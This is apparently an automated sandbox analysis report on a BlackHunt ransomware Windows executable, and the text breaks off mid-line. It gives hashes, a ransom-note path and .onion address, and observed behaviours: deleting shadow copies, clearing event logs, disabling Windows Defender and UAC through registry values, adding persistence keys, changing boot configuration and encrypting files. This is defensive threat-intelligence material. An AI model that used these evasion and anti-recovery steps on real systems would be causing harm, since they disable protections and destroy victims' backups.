Analysis
-
max time kernel
121s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
18/01/2024, 22:59
Static task
static1
Behavioral task
behavioral1
Sample
344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe
Resource
win10v2004-20231215-en
General
-
Target
344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe
-
Size
707KB
-
MD5
17af544d9468e3fecadbbae342eb49b9
-
SHA1
7924a7fe6343b26686642dffbbb0cf35f58402dc
-
SHA256
344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e
-
SHA512
fa062da8dc26c4c4d958d7d4f8964ffe4ec33b5522ce543b9450081b542b18416af32c0f53f0217a9f9edaab0ea78f8fba5d370e6e63232a21c161eecf7afcc1
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza148wvnh:6uaTmkZJ+naie5OTamgEoKxLWTuh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 1976 fsutil.exe 3264 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 604 wevtutil.exe 3092 wevtutil.exe 3016 wevtutil.exe 3220 wevtutil.exe 3292 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2140 bcdedit.exe 2692 bcdedit.exe 1268 bcdedit.exe 3284 bcdedit.exe -
Renames multiple (2881) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2488 wbadmin.exe 3268 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 3388 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\X: 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened (read-only) \??\W: 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened (read-only) \??\Y: 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened (read-only) \??\I: 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened (read-only) \??\V: 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened (read-only) \??\O: 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened (read-only) \??\S: 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened (read-only) \??\G: 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened (read-only) \??\J: 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\U: 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened (read-only) \??\P: 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened (read-only) \??\H: 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened (read-only) \??\L: 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\Q: 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened (read-only) \??\E: 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened (read-only) \??\A: 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened (read-only) \??\R: 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened (read-only) \??\N: 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\B: 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened (read-only) \??\M: 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\T: 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened (read-only) \??\K: 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened (read-only) \??\Z: 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\VideoLAN\VLC\locale\te\#BlackHunt_Private.key 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\NOTICE 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.zh_CN_5.5.0.165303.jar 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.event_1.3.100.v20140115-1647.jar 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\Java\jre7\lib\security\blacklist 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Cordoba 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File created C:\Program Files\VideoLAN\VLC\locale\af\#BlackHunt_Private.key 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File created C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\#BlackHunt_ReadMe.hta 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\VideoLAN\VLC\NEWS.txt 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\#BlackHunt_ReadMe.txt 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\vlc.mo 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\7-Zip\Lang\nb.txt 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\GoldRing.png 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\#BlackHunt_ReadMe.hta 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\WET 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\THIRDPARTYLICENSEREADME.txt 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File created C:\Program Files\Java\jre7\lib\zi\Pacific\#BlackHunt_ReadMe.hta 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\London 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\vlc.mo 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\#BlackHunt_ReadMe.txt 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Manaus 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\7-Zip\Lang\io.txt 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\#BlackHunt_Private.key 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\Java\jre7\lib\javaws.jar 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\#BlackHunt_ReadMe.txt 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_image-frame-ImageMask.png 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_ja_4.4.0.v20140623020002.jar 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_zh_CN.jar 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Khartoum 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\7-Zip\Lang\hu.txt 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File created C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\#BlackHunt_ReadMe.txt 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\El_Aaiun 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\#BlackHunt_Private.key 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.properties 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_ja_4.4.0.v20140623020002.jar 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_ja_4.4.0.v20140623020002.jar 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Beulah 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views_3.7.0.v20140408-0703.jar 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\#BlackHunt_ReadMe.txt 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-10 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File created C:\Program Files\VideoLAN\VLC\plugins\control\#BlackHunt_Private.key 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hong_Kong 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\config.ini 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Costa_Rica 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File created C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\#BlackHunt_ReadMe.hta 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\Java\jre7\lib\content-types.properties 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Hobart 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Samara 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\HLS.api 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationLeft_ButtonGraphic.png 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SceneButtonInset_Alpha2.png 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Windhoek 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_ja_4.4.0.v20140623020002.jar 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\favicon.ico 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File created C:\Program Files\Java\jdk1.7.0_80\db\#BlackHunt_Private.key 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Lindeman 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\#BlackHunt_ReadMe.txt 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\#BlackHunt_ReadMe.hta 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Audio-48.png 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\koreus.luac 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationUp_ButtonGraphic.png 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1840 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2844 vssadmin.exe 920 vssadmin.exe 1604 vssadmin.exe 2744 vssadmin.exe 2108 vssadmin.exe 2124 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 3556 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3572 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 3676 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe Token: SeRestorePrivilege 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe Token: SeBackupPrivilege 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe Token: SeTakeOwnershipPrivilege 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe Token: SeAuditPrivilege 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe Token: SeSecurityPrivilege 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe Token: SeIncBasePriorityPrivilege 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe Token: SeBackupPrivilege 1224 vssvc.exe Token: SeRestorePrivilege 1224 vssvc.exe Token: SeAuditPrivilege 1224 vssvc.exe Token: SeBackupPrivilege 2864 wbengine.exe Token: SeRestorePrivilege 2864 wbengine.exe Token: SeSecurityPrivilege 2864 wbengine.exe Token: SeSecurityPrivilege 604 wevtutil.exe Token: SeBackupPrivilege 604 wevtutil.exe Token: SeSecurityPrivilege 3092 wevtutil.exe Token: SeBackupPrivilege 3092 wevtutil.exe Token: SeSecurityPrivilege 3016 wevtutil.exe Token: SeBackupPrivilege 3016 wevtutil.exe Token: SeSecurityPrivilege 3220 wevtutil.exe Token: SeBackupPrivilege 3220 wevtutil.exe Token: SeSecurityPrivilege 3292 wevtutil.exe Token: SeBackupPrivilege 3292 wevtutil.exe Token: SeDebugPrivilege 3556 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1748 wrote to memory of 2108 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 29 PID 1748 wrote to memory of 2108 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 29 PID 1748 wrote to memory of 2108 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 29 PID 1748 wrote to memory of 2108 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 29 PID 1748 wrote to memory of 2096 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 31 PID 1748 wrote to memory of 2096 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 31 PID 1748 wrote to memory of 2096 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 31 PID 1748 wrote to memory of 2096 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 31 PID 1748 wrote to memory of 2080 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 33 PID 1748 wrote to memory of 2080 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 33 PID 1748 wrote to memory of 2080 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 33 PID 1748 wrote to memory of 2080 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 33 PID 2108 wrote to memory of 1308 2108 cmd.exe 34 PID 2108 wrote to memory of 1308 2108 cmd.exe 34 PID 2108 wrote to memory of 1308 2108 cmd.exe 34 PID 1748 wrote to memory of 2576 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 36 PID 1748 wrote to memory of 2576 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 36 PID 1748 wrote to memory of 2576 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 36 PID 1748 wrote to memory of 2576 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 36 PID 1748 wrote to memory of 2648 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 38 PID 1748 wrote to memory of 2648 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 38 PID 1748 wrote to memory of 2648 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 38 PID 1748 wrote to memory of 2648 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 38 PID 2096 wrote to memory of 2676 2096 cmd.exe 39 PID 2096 wrote to memory of 2676 2096 cmd.exe 39 PID 2096 wrote to memory of 2676 2096 cmd.exe 39 PID 1748 wrote to memory of 2604 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 41 PID 1748 wrote to memory of 2604 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 41 PID 1748 wrote to memory of 2604 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 41 PID 1748 wrote to memory of 2604 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 41 PID 1748 wrote to memory of 2104 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 43 PID 1748 wrote to memory of 2104 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 43 PID 1748 wrote to memory of 2104 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 43 PID 1748 wrote to memory of 2104 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 43 PID 1748 wrote to memory of 1644 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 45 PID 1748 wrote to memory of 1644 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 45 PID 1748 wrote to memory of 1644 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 45 PID 1748 wrote to memory of 1644 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 45 PID 1748 wrote to memory of 2728 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 47 PID 1748 wrote to memory of 2728 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 47 PID 1748 wrote to memory of 2728 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 47 PID 1748 wrote to memory of 2728 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 47 PID 1748 wrote to memory of 2956 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 48 PID 1748 wrote to memory of 2956 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 48 PID 1748 wrote to memory of 2956 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 48 PID 1748 wrote to memory of 2956 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 48 PID 2648 wrote to memory of 2660 2648 cmd.exe 50 PID 2648 wrote to memory of 2660 2648 cmd.exe 50 PID 2648 wrote to memory of 2660 2648 cmd.exe 50 PID 1748 wrote to memory of 2712 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 51 PID 1748 wrote to memory of 2712 1748 344c4d742b8ed0106b5aed4ad3eaf0a90fe45d3aa532e757c86fb55ec65c675e.exe 51 PID 1748 wrote to memory of 2712 1748 